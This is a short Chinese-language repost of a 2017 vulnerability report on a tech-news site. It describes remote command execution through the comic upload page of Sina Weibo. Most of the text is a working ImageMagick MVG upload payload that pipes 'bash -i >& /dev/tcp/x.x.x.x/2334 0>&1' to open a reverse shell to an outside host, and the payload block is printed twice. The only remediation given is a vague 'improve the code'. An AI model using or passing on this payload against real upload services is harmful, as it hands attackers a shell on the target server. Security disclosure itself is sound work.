当前位置: 移动技术网 > 网络运营>安全>企业安全 > 新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)

2017年12月22日  | 移动技术网网络运营  | 我要评论

RT

来到这里https://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

123.png

 

反弹一波

 

22.png

 

来到这里https://manhua.weibo.com/space/upload_comic

上传poc

push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"

pop graphic-context

 

123.png

 

反弹一波

 

22.png

 

解决方案:

完善代码

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网